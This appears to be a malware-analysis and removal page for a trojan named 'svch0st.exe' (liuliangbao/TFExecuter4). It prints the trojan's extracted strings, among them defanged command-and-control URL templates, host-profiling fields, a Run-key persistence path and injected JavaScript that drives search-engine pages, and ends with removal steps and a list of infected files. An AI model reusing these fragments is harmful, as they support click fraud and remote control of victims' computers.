DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_3196_rwx_6F9D1000_00001000:

Ew.AEw

RCv=kAv.SCvs

KERNELBASE.DLL

svch0st.exe_2632_rwx_00081000_00110000:

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

svch0st.exe_2632_rwx_00193000_00001000:

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

RegCloseKey

CertOpenStore

SHDeleteKeyW

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_2632_rwx_69551000_00001000:

d3d10d.dll

id3d10ref.dll

d3d10core.dll

d3d10warp.dll

The application was compiled against and will only work with D3D10_SDK_VERSION (%d), but the currently installed runtime is version (%d).

.XiJ-Xi

#pragma ruledisable 0xx

#pragma warning (disable:%d)

#pragma warning (error:%d)

#pragma warning (once:%d)

#pragma def (%s, %s, %g, %g, %g, %g)

D3D10PreprocessShader

duplicate attribute %s

unknown attribute %s, or attribute invalid for this statement

internal error: argument missing context (A%u)

?internal error: operand type mismatch

invalid register specification, expected '%c' binding

user defined %s buffers cannot be target specific

Duplicated input semantics can't change type, size, or layout ('%s').

array dimension for %s must be %i

register or offset bind %s.%s not valid

Cannot map loop to shader target, target does not support breaks

Loop only executes for %d iteration(s), forcing loop to unroll

Unable to unroll loop, loop does not appear to terminate in a timely manner (%d iteratio

svch0st.exe_2632_rwx_69751000_00001000:

(Bv.SCv=kAv

JSCRIPT9.dll

svch0st.exe_2632_rwx_69911000_00001000:

Bv.SCv

BvsuAv.TBv(JBv

.wcg-w

svch0st.exe_2632_rwx_6B1EB000_00001000:

Fv=kAv.SCv

svch0st.exe_2632_rwx_6D351000_00001000:

>mInvalid parameter passed to C runtime function.

svch0st.exe_2632_rwx_6D9E1000_00001000:

GDI32.DLL

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts

SOFTWARE\Microsoft\Windows\CurrentVersion\Fonts

t2embed.pdb

SSShttcfW

svch0st.exe_2632_rwx_6DA01000_00001000:

'i' is only supported with debug builds.

*** %s%ls%sSource: `%ls:%ld`

vsStageData.Color = Diffuse;

vsStageData.UV = UV;

float2 inputUV = vsStageData.UV;

vsStageData.UV.x = inputUV.x*mat3x2TextureTransform0[0]   inputUV.y*mat3x2TextureTransform0[1]   mat3x2TextureTransform0[2];

vsStageData.UV.y = inputUV.x*mat3x2TextureTransform1[0]   inputUV.y*mat3x2TextureTransform1[1]   mat3x2TextureTransform1[2];

vsStageData.Color = Color;

BlendColor = vsStageData.Color;

Diffuse = vsStageData.Color;

uv = vsStageData.UV;

halfTexelSizeNormalized_and_vCoord = Data_halfTexelSizeNormalized_and_vCoord;

halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized = Data_halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized;

gradOrigin_and_firstTexelRegionCenter = Data_gradOrigin_and_firstTexelRegionCenter;

USERProcessHandleQuota

GDIProcessHandleQuota

kernel32.dll

Software\Microsoft\Avalon.Graphics

d:\win7sp1_gdr\windows\wgi\shared\util\utillib\debugbreak.cpp

svch0st.exe_2632_rwx_6DFC1000_00002000:

.wb\-w

.wH2-w

.wq -w;

Bv.TBv2

D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)

Prop%d

FEATURE_URLFILE_CACHEFLUSH_KB936881

svch0st.exe_2632_rwx_6E951000_00001000:

zFw.AEw

CLSID\%s\InProcServer32

VID_X&PID_X

%s\%s

Joystick%dOEMName

GAMEPORT\VID_045E&PID_010C

GAMEPORT\VID_045E&PID_010B

GAMEPORT\VID_045E&PID_010A

GAMEPORT\VID_045E&PID_0109

GAMEPORT\VID_045E&PID_0108

GAMEPORT\VID_045E&PID_0107

GAMEPORT\VID_045E&PID_0106

GAMEPORT\VID_045E&PID_0105

GAMEPORT\VID_045E&PID_0104

GAMEPORT\VID_045E&PID_0103

GAMEPORT\VID_045E&PID_0102

JoystickßFConfiguration

JoystickÜonfiguration

svch0st.exe_2632_rwx_6E981000_00001000:

d:\w7rtm\base\diagnosis\pdi\pdh\pdhdll\query.c

d:\w7rtm\base\diagnosis\pdi\pdh\pdhlog\log.c

SOFTWARE\Microsoft\Windows NT\CurrentVersion\PDH

svch0st.exe_2632_rwx_6F9D1000_00001000:

Ew.AEw

RCv=kAv.SCvs

KERNELBASE.DLL

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

svch0st.exe:3204
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\System32\svch0st.exe (742 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\MTFlashStore[1].swf (1048 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads6[1].htm (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ad_cleaner[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\fl[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8P2IKO3V.txt (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\detail[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\myTab[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[5].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TQEXK3AF.txt (292 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KTNO4VM2.txt (123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#irs01.net\settings.sxx (683 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[2].js (122 bytes)
